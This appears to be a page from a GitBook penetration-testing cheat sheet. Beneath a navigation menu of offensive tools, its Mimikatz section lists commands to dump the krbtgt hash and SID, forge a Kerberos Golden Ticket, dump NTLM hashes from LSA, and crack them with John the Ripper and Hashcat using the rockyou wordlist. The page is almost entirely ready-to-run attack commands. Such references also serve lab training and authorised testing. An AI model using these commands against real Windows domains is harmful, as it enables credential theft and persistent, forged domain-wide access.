๐Ÿ‘จโ€๐Ÿ’ป
Pentesting
  • Prerequisite
  • Penetration Testing Stages
  • Enumeration/Scanning
    • Nmap
    • Netdiscover
  • Web Attack
    • Ffuf
    • Dirb
    • GoBuster
    • Dirsearch
    • FeroxBuster
    • Wfuzz
    • Nikto
  • SSH
    • Download File
  • Transporting Files
    • Windows
    • Linux
  • Port Forwarding & Pivoting
  • Pwncat
  • SMB
    • SmbClient
    • SmbMap
  • SQL Injection
  • Reverse Shells
    • PHP Pentest Monkey
    • Bash
    • PHP
      • Voting System 1.0 - Remote Code Execution (Unauthenticated)
    • Netcat
    • Python
    • Nishang
  • Impacket
    • psexec.py
    • wmiexec.py
    • secretsdump.py
    • impacket-smbserver
    • GetUserSPNs.py
  • Active Directory Attacks
    • Enum4linux
    • Kerbrute
    • Responder.py
    • RPCclient
    • Crackmapexec
    • BloodHound-Python
    • Powerview.ps1
    • GetUserSPNs.py
    • SharpHound.ps1
    • Mimikatz
    • Metasploit
  • Password Cracking
    • Hydra
      • FTP
      • SSH
      • HTTP
    • Hashcat
    • John The Ripper
      • Jumbo John
  • Powershell
    • Secure String Powershell
  • MSFVenom
    • MSFVenom Payload
    • Multihandler Listener
    • AlwaysInstallElevated
  • Meterpreter
  • Privilege Escalation
    • Linux
      • GTFOBins
      • linPEAS
    • Windows
      • LOLBAS
      • winPEAS
      • AlwaysInstallElevated
      • System Enumeration
      • User Enum
      • Network Enumeration
  • WordPress
    • Wpscan
Powered by GitBook
On this page
  1. Active Directory Attacks

Mimikatz

PreviousSharpHound.ps1NextMetasploit

Last updated 2 years ago

> . .\mimikatz.exe
  privilege::debug [privilege "20" ok]
  
. Dump the hash and security identifier of the Kerberos Ticket Granting Ticket account
> lsadump::lsa /inject /name:krbtgt 

. Create a Golden Ticket
> kerberos::golden /user: /domain: /sid: /krbtgt: /id:

. Dump NTLM hashes
> lsadump::lsa /patch

. Cracking NTLM hash with John the Ripper and Hashcat
> john --format=NT hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
> hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
Release 2.2.0 20220919 Djoin parser & Citrix SSO Extractor ยท gentilkiwi/mimikatzGitHub
mimikatz binary
Logo